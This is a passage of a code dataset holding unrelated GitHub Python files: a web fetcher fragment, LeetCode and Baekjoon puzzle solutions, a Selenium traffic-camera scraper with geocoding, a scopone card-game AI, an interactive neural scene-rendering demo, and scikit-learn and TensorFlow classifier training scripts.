errors='replace')\n encoding = 'utf-8'\n content_write_flag = 'w'\n\n # Writing file on disk\n if data and not namespace.contents_in_report:\n\n if namespace.compress:\n filename += '.gz'\n\n resource_path = join(namespace.output_dir, filename)\n resource_dir = dirname(resource_path)\n\n os.makedirs(resource_dir, exist_ok=True)\n\n with open(resource_path, content_write_flag) as f:\n\n # TODO: what if standardize_encoding + compress?\n f.write(gzip.compress(data) if namespace.compress else data)\n\n # Reporting in output\n resolved_url = response.geturl()\n\n write_output(\n line_index,\n line,\n resolved=resolved_url if resolved_url != result.url else None,\n status=response.status,\n filename=filename,\n encoding=encoding,\n data=data\n )\n\n # Handling potential errors\n else:\n error_code = report_error(result.error)\n\n write_output(\n line_index,\n line,\n error=error_code\n )\n\n # Closing files\n if namespace.output is not None:\n output_file.close()\n","repo_name":"AleksiKnuutila/minet-fork","sub_path":"cli/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17628965327","text":"'''\nThe set [1, 2, 3, ..., n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order\n, we get the following sequence for n = 3:\n\n\"123\"\n\"132\"\n\"213\"\n\"231\"\n\"312\"\n\"321\"\nGiven n and k, return the kth permutation sequence.\n'''\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n res = ''\n nums = [x for x in range(1, n+1)]\n fac = 1\n top = n-1\n for i in range(2, n):\n fac*=i\n\n while len(nums)>0:\n group = (k-1)//fac\n k%=fac\n fac//=top\n top = top-1 if top-1>1 else 1 # top = top-1>1 ? top-1 : 1\n res+=str(nums[group])\n nums.pop(group)\n return res\n \n \n\ndef main():\n n=8\n k=20161\n print(Solution.getPermutation(Solution(), n, k))\n\nif __name__=='__main__':\n main()\n","repo_name":"BoTWGitHub/LeecodePractice","sub_path":"python/LeetCode Quiz/No60.py","file_name":"No60.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41306517488","text":"n=[list(map(int,input().split())) for _ in range(5)]\r\nimport sys\r\nsys.setrecursionlimit(10**8)\r\nanswer=[]\r\ndef dfs(x,y,num):\r\n global answer\r\n if len(num)==6:\r\n answer.append(int(num))\r\n return\r\n dx=[-1,1,0,0]\r\n dy=[0,0,1,-1]\r\n for i in range(4):\r\n xx=x+dx[i]\r\n yy=y+dy[i]\r\n if 0<=xx<5 and 0<=yy<5:\r\n dfs(xx,yy,num+str(n[xx][yy]))\r\n\r\nfor i in range(5):\r\n for j in range(5):\r\n dfs(i,j,'')\r\nanswer.sort()\r\nanswer=set(answer)\r\nprint(len(answer))","repo_name":"harimyong/baekjoon","sub_path":"백준/Silver/2210. 
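getPermutation above walks the factorial number system: with fac = (n-1)! permutations per choice of leading element, group = (k-1)//fac picks that element, and the remainder recurses on a shrinking list. Worked trace for n=3, k=3 (expected '213'):

# nums=[1,2,3], fac=2!=2, top=2, k=3
# step 1: group=(3-1)//2=1 -> take nums[1]='2'; k=3%2=1; fac=1
# step 2: group=(1-1)//1=0 -> take nums[0]='1'; k=1%1=0
# step 3: group=(0-1)//1=-1 -> nums[-1]='3'; the k=0 case lands on the last
#         remaining element via negative indexing, giving '213'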
숫자판 점프/숫자판 점프.py","file_name":"숫자판 점프.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25640105350","text":"# encoding=utf8\n\"\"\" \n--------------------------------------------------------------------------------\nDescriptive Name : Queensland.py\nAuthor : Shengli Sui\t\t\t\t\t\t\t\t \nContact Info : ssui@purdue.edu\nDate Written : June 29,0216\nDescription : Parse cameras on the Queensland, AUS traffic camera website\nCommand to run script: python Queensland.py\nOutput : list_Queensland.txt\nNote : \nOther files required by : N/A\nthis script and where \nlocated\n\n----For Parsing Scripts---------------------------------------------------------\nWebsite Parsed : http://www.tmr.qld.gov.au/Traffic-cameras-by-location.aspx\nIn database (Y/N) : Y\nDate added to Database : June 29, 2016\n--------------------------------------------------------------------------------\n\"\"\"\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.select import Select\nimport urllib\nimport urllib2\n\nimport re\nimport json\nimport time\nimport codecs\n\n\n\nclass Brisbane:\n def __init__(self):\n self.driver = webdriver.Firefox()\n self.f = open('list_Queensland.txt', 'w')\n \n def gAPI(self, locat, city, link, f):\n time.sleep(0.2);\n api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + locat + \", \" + city + \",Queensland, Australia\"\n api = api.replace(' ','')\n ''' use API to find the latitude and longitude'''\n response = urllib2.urlopen(api).read()\n #load by json module\n parsed_json= json.loads(response)\n content= parsed_json['results']\n #extract latitude and longitude from the API json code\n loc= content[0]\n geo = loc['geometry']\n location2 = geo['location']\n lat = location2['lat']\n lng = location2['lng']\n #change lat and lng to string\n string_lat = str(lat)\n string_lng = str(lng)\n #print string_lat,string_lng\n locat = 'AU'+'#'+city+'#'+link+'#'+string_lat+'#'+string_lng\n f.write(locat.encode('utf-8').replace(\" \",\"\").replace(\"\\n\",'')+'\\n')\n \n def gAPI_city(self, locat, city, link, f):\n time.sleep(0.2)\n api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + city + \",Queensland, Australia\"\n api = api.replace(' ','')\n ''' use API to find the latitude and longitude'''\n response = urllib2.urlopen(api).read()\n #load by json module\n parsed_json= json.loads(response)\n content= parsed_json['results']\n #extract latitude and longitude from the API json code\n loc= content[0]\n geo = loc['geometry']\n location2 = geo['location']\n lat = location2['lat']\n lng= location2['lng']\n #change lat and lng to string\n string_lat = str(lat)\n string_lng = str(lng)\n #print string_lat,string_lng\n locat = 'AU'+'#'+city+'#'+link+'#'+string_lat+'#'+string_lng\n f.write(locat.encode('utf-8').replace(\" \",\"\").replace(\"\\n\",'')+'\\n')\n \n def getData(self):\n self.driver.get(\"http://www.tmr.qld.gov.au/Traffic-cameras-by-location.aspx\")\n place=self.driver.find_elements_by_css_selector(\"a[href*='/Traffic-cameras-by-location/Traffic-cameras.aspx?region']\")\n numplace=len(place)\n countplace=0\n while countplace= giocata[0].value:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\tpar.append((n == len(carte_mano))*flag)\n\t\t\t\n\t\t\t\t#non 7 a terra\n\t\t\t\tn=0\n\t\t\t\tif 
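The Queensland parser's gAPI helpers call Google's geocoding endpoint and drill into results[0].geometry.location for lat/lng. The same extraction with the requests library (a sketch: 'requests' and the api_key parameter are assumptions; current Google endpoints reject the keyless requests the 2016 script relied on):

import requests

def geocode(address, api_key):
    resp = requests.get(
        'https://maps.googleapis.com/maps/api/geocode/json',
        params={'address': address, 'key': api_key},
    ).json()
    # Same drill-down as gAPI above: results[0] -> geometry -> location.
    loc = resp['results'][0]['geometry']['location']
    return loc['lat'], loc['lng']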
len(self.prese(widgets.Card(0,7),carte_terra+[giocata[0]])) != 0:\n\t\t\t\t\tn=1\n\t\t\t\tpar.append(n*flag)\n\t\t\t\n\t\t\t\t#presa dopo\n\t\t\t\tpresa_dopo = 0\n\t\t\t\tfor carta in carte_mano:\n\t\t\t\t\tif carta != giocata[0]:\n\t\t\t\t\t\tif len(self.prese(carta,carte_terra+[giocata[0]])) != 0:\n\t\t\t\t\t\t\tpresa_dopo += 1\n\t\t\t\tpar.append(presa_dopo*flag)\n\t\t\t\n\t\t\t\t#scopa avversario\n\t\t\t\tvalore_terra = giocata[0].value\n\t\t\t\tfor carta in carte_terra:\n\t\t\t\t\tvalore_terra += carta.value\n\t\t\t\tpar.append((valore_terra <= 10)*flag)\n\n\t\t\t\t### no_prese=0\n\t\t\t\tflag = not no_prese\n\t\t\t\t#scopa\n\t\t\t\tpar.append((len(giocata[1]) == len(carte_terra))*flag)\n\t\t\t\n\t\t\t\t#scopa avversario\n\t\t\t\tvalore_terra = 0\n\t\t\t\tfor carta in carte_terra:\n\t\t\t\t\tif not carta in giocata[1]:\n\t\t\t\t\t\tvalore_terra += carta.value\n\t\t\t\tif giocata[1] == []:\n\t\t\t\t\tvalore_terra += giocata[0].value\n\t\t\t\tpar.append((valore_terra <= 10)*flag)\n\t\t\t\n\t\t\t\t### se non si prende niente\n\t\t\t\tflag = (not no_prese)*(len(giocata[1]) == 0)\n\t\t\t\n\t\t\t\t#non denaro\n\t\t\t\tpar.append((giocata[0].suit != 0)*flag)\n\t\t\t\n\t\t\t\t#non 7\n\t\t\t\tpar.append((giocata[0].value != 7)*flag)\n\t\t\t\n\t\t\t\t#carta piu' bassa\n\t\t\t\tfor carta in carte_mano:\n\t\t\t\t\tif carta.value > giocata[0].value:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\tpar.append((n == len(carte_mano))*flag)\n\t\t\t\n\t\t\t\t### se si prende qualcosa\n\t\t\t\tflag = (not no_prese)*(len(giocata[1]) != 0)\n\t\t\t\tcarte_da_prendere=list(giocata[1])\n\t\t\t\tcarte_da_prendere.append(giocata[0])\n\t\t\t\n\t\t\t\t#numero carte prese\n\t\t\t\tpar.append(len(carte_da_prendere)*flag)\n\t\t\t\n\t\t\t\ttmp = [0,0,0,0,0]\n\t\t\t\tfor carta in carte_da_prendere:\n\t\t\t\t\t#se denaro\n\t\t\t\t\tif carta.suit == 0:\n\t\t\t\t\t\ttmp[0] += 1\n\t\t\t\t\t#se sette\n\t\t\t\t\tif carta.value == 7:\n\t\t\t\t\t\ttmp[1] += 1\n\t\t\t\t\t\t#se sette bello\n\t\t\t\t\t\tif carta.suit == 0:\n\t\t\t\t\t\t\ttmp[2] += 1\n\t\t\t\t\t#se sei\n\t\t\t\t\tif carta.value == 6:\n\t\t\t\t\t\ttmp[3] += 1\n\t\t\t\t\t#se asso\n\t\t\t\t\tif carta.value == 1:\n\t\t\t\t\t\ttmp[4] += 1\n\t\t\t\tfor v in tmp:\n\t\t\t\t\tpar.append(v*flag)\n\t\t\t\t\n\t\t\t\tvalue = self.players[self.giocatore].value(par, ai_values)\n\t\t\t\tif value > migliore[2]:\n\t\t\t\t\tmigliore[0], migliore[1], migliore[2] = giocata[0], giocata[1], value\n\t\t\n\t\tself.players[self.giocatore].update_memory(migliore[1], len(migliore[1])==carte_terra)\n\t\tself.gioca_carta(self.giocatore,migliore[0],migliore[1])\n","repo_name":"marcoscarpetta/scopy","sub_path":"src/libscopy/scopone.py","file_name":"scopone.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6423436858","text":"###########################################\n# Keyboard Control Instruction #\n#-----------------------------------------#\n# R: Switch /. #\n# W/A/S/D: Move. #\n# Q/E: Turn perspective. #\n# Z/C: Around the ring. #\n# 1~8: Move to observation pose. #\n# SPACE: Next data. #\n# ENTER: Re-render the canvas. 
# \n###########################################\n\nimport numpy as np\nimport cv2\nimport argparse\nimport parse_config\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom srgqn import SRGQN\nfrom dataset import GqnDatasets\nnp.set_printoptions(precision=3)\n\ndef draw_camera(img_map, v, color=(1,0,0), fov=50, map_size=240, fill_size=8, line_size=400, center_line=True):\n global view_inverse\n img_map = cv2.flip(img_map, 0)\n pos = (fill_size+int(map_size/2*(1+v[0])), fill_size+int(map_size/2*(1+v[1])))\n ang = np.arctan2(v[4], v[3])\n if view_inverse:\n ang += np.pi\n pts1 = (int(pos[0] + line_size*np.cos(ang)), int(pos[1] + line_size*np.sin(ang)))\n pts2 = (int(pos[0] + line_size*np.cos(ang+np.deg2rad(fov/2))), int(pos[1] + line_size*np.sin(ang+np.deg2rad(fov/2))))\n pts3 = (int(pos[0] + line_size*np.cos(ang-np.deg2rad(fov/2))), int(pos[1] + line_size*np.sin(ang-np.deg2rad(fov/2))))\n #\n cv2.circle(img_map, pos, 5, color, 3)\n if center_line:\n cv2.line(img_map, pos, pts1, color, 1)\n else:\n cv2.line(img_map, pts2, pts3, color, 2)\n cv2.line(img_map, pos, pts2, color, 2)\n cv2.line(img_map, pos, pts3, color, 2)\n #\n img_map = cv2.flip(img_map, 0)\n return img_map\n\ndef gaussian_heatmap(mean, std, size):\n img = np.zeros(size, dtype=np.float32)\n mean_pix = (mean[0]*size[0], mean[1]*size[1])\n std_pix = std * size[0]\n for i in range(size[1]):\n for j in range(size[0]):\n temp = ((i-mean_pix[0])**2 + (j-mean_pix[1])**2)/std_pix**2\n img[j,i,:] = np.exp(-0.5 * temp) / (2*np.pi*std_pix**2)\n return img\n\n############ Parameter Parsing ############\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', nargs='?', type=str ,help='Experiment name.')\nparser.add_argument(\"-i\", \"--view_inverse\", help=\"view inverse\", action=\"store_true\")\nparser.add_argument(\"-k\", \"--keyboard\", help=\"human control\", action=\"store_true\")\nparser.add_argument(\"-a\", \"--auto_demo\", help=\"Auto demo\", action=\"store_true\")\nexp_path = parser.parse_args().path\nsave_path = exp_path + \"save/\"\nargs = parse_config.load_eval_config(exp_path)\nprint(exp_path)\n\n# Print \nprint(\"Number of world cells: %d\"%(args.w))\nprint(\"Size of view cells: \" + str(args.v))\nprint(\"Number of concepts: %d\"%(args.c))\nprint(\"Number of channels: %d\"%(args.ch))\nprint(\"Downsampling size of view cell: %d\"%(args.down_size))\nprint(\"Number of draw layers: %d\"%(args.draw_layers))\nif args.share_core:\n print(\"Share core: True\")\nelse:\n print(\"Share core: False\")\n\n############ Dataset ############\npath = args.data_path\ntest_dataset = GqnDatasets(root_dir=path, train=False, fraction=args.frac_test)\nprint(\"Data path: %s\"%(args.data_path))\nprint(\"Data fraction: %f / %f\"%(args.frac_train, args.frac_test))\nprint(\"Test data: \", len(test_dataset))\n\n############ Networks ############\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnet = SRGQN(n_wrd_cells=args.w, view_size=args.v, csize=args.c, ch=args.ch, vsize=7, \\\n draw_layers=args.draw_layers, down_size=args.down_size, share_core=args.share_core).to(device)\nnet.load_state_dict(torch.load(save_path+\"srgqn.pth\"))\nnet.eval()\n\n############ Parameters ############\ndata_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\nimg_size = (256,256)\nfov = 50\nmap_size = 240\nfill_size = 8\nobs_size = 8\ndemo_loop = 2\nhuman_control = parser.parse_args().keyboard #True#False\nview_inverse = parser.parse_args().view_inverse 
#True#False\nobs_increase = parser.parse_args().auto_demo\nrender = True\nsignal_pos = None\nfeat_size = 16\n\n############ Events ############\ndef onMouse(event, x, y, flags, param):\n global obs_act, img_size, render, signal_pos, feat_size\n obs_size = (int(img_size[0]/2), int(img_size[1]/2))\n if event == cv2.EVENT_LBUTTONDOWN:\n idxy = (int(x/obs_size[1]), int(y/obs_size[0]))\n id = 4*idxy[0] + idxy[1]\n #print(id)\n if id < 8:\n render = True\n if obs_act[id] == 0:\n obs_act[id] = 1\n else:\n obs_act[id] = 0\n #print(obs_act)\n if event == cv2.EVENT_RBUTTONDOWN:\n idxy = (int(x/img_size[1]*2), int(y/img_size[0]*2))\n id = 4*idxy[0] + idxy[1]\n x_local = x % obs_size[1]\n y_local = y % obs_size[0]\n if obs_size[1]*0.05 < x_local < obs_size[1]*0.95 and \\\n obs_size[0]*0.05 < y_local < obs_size[0]*0.95 and id < 8:\n x_local_norm = x_local / obs_size[1]\n y_local_norm = y_local / obs_size[0]\n print(x_local_norm, y_local_norm, id)\n signal_pos = {\"global\":(x,y), \"local\":(x_local_norm, y_local_norm), \"id\":id}\n render = True\n if event == cv2.EVENT_MOUSEWHEEL:\n if flags > 0:\n #print(\"up\")\n if feat_size < 64:\n feat_size *= 2\n render = True\n else:\n #print(\"down\")\n if feat_size > 8:\n feat_size = int(feat_size/2)\n render = True\n \ncv2.namedWindow('View')\ncv2.setMouseCallback('View', onMouse)\n\n############ Main ############\ndef demo(x_obs, v_obs):\n global human_control, render, obs_act, demo_loop, signal_pos, feat_size, ent_queue\n render = True\n x_obs_torch = x_obs.to(device)\n v_obs_torch = v_obs.to(device)\n net.construct_scene_representation(x_obs_torch, v_obs_torch)\n obs_act = np.array([0]*obs_size)\n obs_act[0:1] = 1\n\n # Map\n img_map = 0.0*np.ones((map_size+2*fill_size, map_size+2*fill_size,3))\n center_pos = (int(map_size/2+fill_size), int(map_size/2+fill_size))\n cv2.circle(img_map, center_pos, int(map_size/2), (0,1,0), 1)\n \n # Initialize Pose\n query_ang = np.rad2deg(np.arctan2(v_obs[0,1], v_obs[0,0]))\n if human_control:\n ang = np.arctan2(v_obs[0,4], v_obs[0,3])\n pos = [float(v_obs[0,0].numpy()), float(v_obs[0,1].numpy())]\n else:\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n \n step = 0\n while(True):\n # Query Pose\n v_query = np.array([pos[0], pos[1], 0, np.cos(ang), np.sin(ang), 1, 0])\n print(\"\\rStep:\", str(step).zfill(3), \"/\", 180*demo_loop+1 ,\", Camera Pose:\", pos, np.rad2deg(ang), end=\"\")\n\n # Render\n if render:\n render = False\n # Network Forward\n v_query_torch = torch.FloatTensor(v_query).unsqueeze(0)\n x_query = net.scene_render(v_query_torch.to(device), obs_act)\n x_query = x_query[0].detach().cpu()\n x_query_view = cv2.cvtColor(x_query.permute(1,2,0).numpy(), cv2.COLOR_BGR2RGB)\n x_query_view = cv2.resize(x_query_view, img_size, interpolation=cv2.INTER_NEAREST)\n \n # Draw Signal\n if signal_pos is not None:\n std = 0.04\n hp = gaussian_heatmap(signal_pos[\"local\"], std, (feat_size,feat_size,args.c))\n view_cell_sim = hp / np.max(hp) * 50\n view_cell_torch = torch.FloatTensor(view_cell_sim).reshape(1,feat_size,feat_size,args.c).permute(0,3,1,2).to(device)\n routing = net.visualize_routing(view_cell_torch, v_obs_torch[signal_pos[\"id\"]].unsqueeze(0), v_query_torch.to(device), view_size=(feat_size, feat_size))\n routing = routing.permute(0,2,3,1).detach().cpu().reshape(feat_size,feat_size,args.c).numpy()[:,:,0:3]\n signal_query = cv2.resize(routing, img_size, interpolation=cv2.INTER_NEAREST)\n x_query_view 
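onMouse above multiplexes left click, right click and the wheel through a single OpenCV callback registered with cv2.setMouseCallback. The minimal wiring, reduced to a runnable skeleton (window name and handler are illustrative):

import cv2
import numpy as np

def on_mouse(event, x, y, flags, param):
    # OpenCV invokes this with an event code and the cursor position.
    if event == cv2.EVENT_LBUTTONDOWN:
        print('left click at', (x, y))

cv2.namedWindow('demo')
cv2.setMouseCallback('demo', on_mouse)
cv2.imshow('demo', np.zeros((240, 320, 3), np.uint8))
cv2.waitKey(0)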
= x_query_view * (signal_query*0.75+0.25)\n\n # Draw Query Image\n ren_text = \"Render\"\n if signal_pos is None:\n ren_text = \"Render\"\n else:\n ren_text = \"Query Signal \" + str(feat_size) + \"x\" + str(feat_size)\n cv2.putText(x_query_view, ren_text, (10,24), cv2.FONT_HERSHEY_TRIPLEX , 0.6, (0,0,1), 1, cv2.LINE_AA)\n cv2.rectangle(x_query_view, (0,0), img_size, (0,0,1), 12)\n\n # Draw Observation Images\n x_obs_canvas = 0.2*np.ones([img_size[0]*2, img_size[1], 3], dtype=np.float32)\n for i in range(x_obs.shape[0]):\n osize = (int(img_size[0]/2), int(img_size[1]/2))\n c = int(255*(0.8/x_obs.shape[0]*i+0.1)) * np.array([1,1], dtype=np.uint8)\n color = cv2.applyColorMap(c, cv2.COLORMAP_VIRIDIS)[0,0] / 255.0\n \n x_obs_view = cv2.cvtColor(x_obs[i].permute(1,2,0).numpy(), cv2.COLOR_BGR2RGB)\n x_obs_view = cv2.resize(x_obs_view, osize, interpolation=cv2.INTER_NEAREST)\n if obs_act[i] == 0:\n x_obs_view *= 0.2\n cv2.rectangle(x_obs_view, (0,0), osize, color, 8)\n text = \"Obs\" + str(i+1)\n cv2.putText(x_obs_view, text, (5,20), cv2.FONT_HERSHEY_TRIPLEX , 0.6, color, 1, cv2.LINE_AA)\n x_obs_canvas[(i%4)*osize[0]:(i%4+1)*osize[0], int(i/4)*osize[1]:int(i/4+1)*osize[1]] = x_obs_view\n\n # Draw Observation Cameras\n img_map_cam = img_map.copy()\n for i in range(obs_act.shape[0]):\n c = int(255*(0.8/obs_act.shape[0]*i+0.1)) * np.array([1,1], dtype=np.uint8)\n color = cv2.applyColorMap(c, cv2.COLORMAP_VIRIDIS)[0,0] / 255.0\n if obs_act[i] == 1: \n img_map_cam = draw_camera(img_map_cam, v_obs[i].numpy(), color=color, line_size=30, center_line=False)\n \n # Draw Query Camera\n img_map_cam = draw_camera(img_map_cam.copy(), v_query, color=(0,0,1))\n cv2.rectangle(img_map_cam, (0,0), img_size, (0.4,0.4,0.4), 12)\n cv2.putText(img_map_cam, \"Cam\", (10,25), cv2.FONT_HERSHEY_TRIPLEX , 0.6, (0.4,0.4,0.4), 1, cv2.LINE_AA)\n view_canvas = cv2.vconcat([x_query_view.astype(np.float32), img_map_cam.astype(np.float32)])\n view_canvas = cv2.hconcat([x_obs_canvas, view_canvas])\n if signal_pos is not None:\n cv2.circle(view_canvas, signal_pos['global'], 5, (0,1,1), 3)\n cv2.imshow(\"View\", view_canvas)\n \n ########################################################\n # View Control\n if human_control:\n k = cv2.waitKey(10)\n # Ring Control\n if k == ord('z'):\n render = True\n query_ang -= 2\n query_ang = query_ang % 360\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n if k == ord('c'):\n render = True\n query_ang += 2\n query_ang = query_ang % 360\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n # Move Control\n if k == ord('w'):\n render = True\n pos[0] -= np.cos(ang) * 0.05\n pos[1] -= np.sin(ang) * 0.05\n if k == ord('s'):\n render = True\n pos[0] += np.cos(ang) * 0.05\n pos[1] += np.sin(ang) * 0.05\n if k == ord('q'):\n render = True\n ang += np.deg2rad(4)\n if k == ord('e'):\n render = True\n ang -= np.deg2rad(4)\n if k == ord('a'):\n render = True\n pos[0] += np.sin(ang) * 0.05\n pos[1] -= np.cos(ang) * 0.05\n if k == ord('d'):\n render = True\n pos[0] -= np.sin(ang) * 0.05\n pos[1] += np.cos(ang) * 0.05\n # Switch to Observation Camera\n if ord('1') <= k <= ord('8'):\n render = True\n cid = int(k - 49) \n ang = np.arctan2(v_obs[cid,4], v_obs[cid,3])\n pos = [float(v_obs[cid,0].numpy()), float(v_obs[cid,1].numpy())]\n # Re-render\n if k == 13:\n render = True\n # Swith Human 
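gaussian_heatmap above evaluates the Gaussian pixel by pixel in a double loop; numpy broadcasting computes the same surface in one shot. A sketch of a vectorized equivalent, assuming size is (H, W, C) exactly as in the original:

import numpy as np

def gaussian_heatmap_fast(mean, std, size):
    mean_pix = (mean[0] * size[0], mean[1] * size[1])
    std_pix = std * size[0]
    # Row/column index grids replace the nested loops over j and i.
    jj, ii = np.meshgrid(np.arange(size[0]), np.arange(size[1]), indexing='ij')
    d2 = ((ii - mean_pix[0]) ** 2 + (jj - mean_pix[1]) ** 2) / std_pix ** 2
    img = np.exp(-0.5 * d2) / (2 * np.pi * std_pix ** 2)
    return np.repeat(img[:, :, None].astype(np.float32), size[2], axis=2)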
Control / Ring Demo\n if k == ord('r'):\n human_control = False\n else:\n render = True\n step += 1\n query_ang += 2\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n if step > 180*demo_loop+1:\n break\n if obs_increase:\n progress = int(step / (180*demo_loop) * 8)\n #print(progress)\n for i in range(len(obs_act)):\n if i <= progress:\n obs_act[i] = 1\n k = cv2.waitKey(1)\n # Swith Human Control / Ring Demo\n if k == ord('r'):\n human_control = True\n # Next / Break\n if k == 32:\n break\n if k == 27:\n exit()\n if k == ord('f'):\n signal_pos = None\n render = True\n print()\n\nobs_act = np.array([0]*obs_size)\nobs_act[0:3] = 1\n#print(\"[ Press any button to start ]\")\n#cv2.waitKey(0)\nfor it, batch in enumerate(data_loader):\n image = batch[0].squeeze(0)\n pose = batch[1].squeeze(0) \n for bit in range(image.shape[0]):\n print(\"[ Data\", it+1, \"| Batch\", bit+1, \"]\")\n x_obs = image[bit,:obs_size]\n v_obs = pose[bit,:obs_size].reshape(-1,7)\n demo(x_obs, v_obs)\n break","repo_name":"jerrywiston/Spatial-Transformation-Routing-Generative-Query-Network","sub_path":"backup/explore2.py","file_name":"explore2.py","file_ext":"py","file_size_in_byte":14324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"740696096","text":"from sklearn.model_selection import KFold\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport warnings\nimport os\nwarnings.filterwarnings(\"ignore\")\nfrom joblib import load\ndef models():\n PROCESSED_DATA_DIR = os.environ[\"PROCESSED_DATA_DIR\"]\n train_data_file = 'train.csv'\n train_data_path = os.path.join(PROCESSED_DATA_DIR, train_data_file)\n# Read data\n df = pd.read_csv(train_data_path, sep=\",\")\n X = df.drop('risk', axis=1)\n y = df['risk']\n\n # Set the number of folds for cross-validation\n k = 5\n\n # Create a KFold object\n kf = KFold(n_splits=k, shuffle=True)\n\n # Initialize a list to store the accuracy scores for each fold\n accuracy_scores = []\n\n for train_index, test_index in kf.split(X):\n # Split the data into training and test sets for the current fold\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n model = SVC()\n lr=SVC()\n lr.fit(X_train,y_train)\n from joblib import dump\n dump(lr, 'lr.joblib')\n # Train the model on the training data\n \n\n # Evaluate the model on the test data\n accuracy = lr.score(X_test, y_test)\n\n # Store the accuracy score for the current fold\n accuracy_scores.append(accuracy)\n\n #print(plot_confusion_matrix(model,X_test,y_test))\n\n # Compute the average accuracy across all folds\n average_accuracy = sum(accuracy_scores) / len(accuracy_scores)\n\n # Print the average accuracy\n print(\"Average accuracy:\", average_accuracy)\nif __name__ == '__main__':\n models()\n","repo_name":"Ghada2021/API-A","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3783925284","text":"#\n# Project 1, starter code part a\n#\nimport math\nimport tensorflow as tf\nimport numpy as np\nimport pylab as plt\nimport os\nfrom sklearn.model_selection import train_test_split\n\nif not os.path.isdir('figures'):\n print('creating the figures folder')\n os.makedirs('figures')\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n\n# scale 
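Model.py's manual KFold loop (fit and score per split, then average) is what sklearn's cross_val_score does in one call; note the loop above also re-dumps lr.joblib on every fold, so only the last fold's model survives. An equivalent sketch on a toy dataset, since train.csv is not available here:

from sklearn.datasets import load_iris
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC

X, y = load_iris(return_X_y=True)
scores = cross_val_score(SVC(), X, y, cv=5)  # one fit/score per fold
print('Average accuracy:', scores.mean())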
data\ndef scale(X, X_min, X_max):\n return (X - X_min) / (X_max - X_min)\n\n\nNUM_FEATURES = 21\nNUM_CLASSES = 3\n\nlearning_rate = 0.01\nepochs = 1200\nseed = 10\ntf.set_random_seed(seed)\n\n\ndef fnn(layer):\n\n loss = None\n logits = None\n batch_size = None\n\n # read train data\n train_input = np.genfromtxt('ctg_data_cleaned.csv', delimiter=',')\n trainX, train_Y = train_input[1:, :21], train_input[1:, -1].astype(int)\n trainX = scale(trainX, np.min(trainX, axis=0), np.max(trainX, axis=0))\n\n trainY = np.zeros((train_Y.shape[0], NUM_CLASSES))\n trainY[np.arange(train_Y.shape[0]), train_Y - 1] = 1 # one hot matrix\n\n # split the test and training data into 70:30\n trainX, testX, trainY, testY = train_test_split(trainX, trainY, test_size=0.3, shuffle=True)\n\n n = trainX.shape[0]\n\n idx = np.arange(n)\n print(idx)\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, NUM_FEATURES])\n y_ = tf.placeholder(tf.float32, [None, NUM_CLASSES])\n\n if layer == 3:\n\n batch_size = 8\n num_neurons = 20\n beta = 1e-9\n\n # Hidden 1\n h_weights = tf.Variable(\n tf.random.truncated_normal([NUM_FEATURES, num_neurons], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h = tf.nn.relu(tf.matmul(x, h_weights) + h_biases)\n\n # Output layer\n weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, NUM_CLASSES], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]), name='biases')\n logits = tf.matmul(h, weights) + biases\n\n # Build the graph for the deep net\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=logits)\n L2_regularization = tf.nn.l2_loss(h_weights) + tf.nn.l2_loss(weights)\n loss = tf.reduce_mean(cross_entropy + beta * L2_regularization)\n\n elif layer == 4:\n\n batch_size = 32\n num_neurons = 10\n beta = 1e-6\n\n # Hidden 1\n h_weights = tf.Variable(\n tf.random.truncated_normal([NUM_FEATURES, num_neurons], stddev=1.0 / 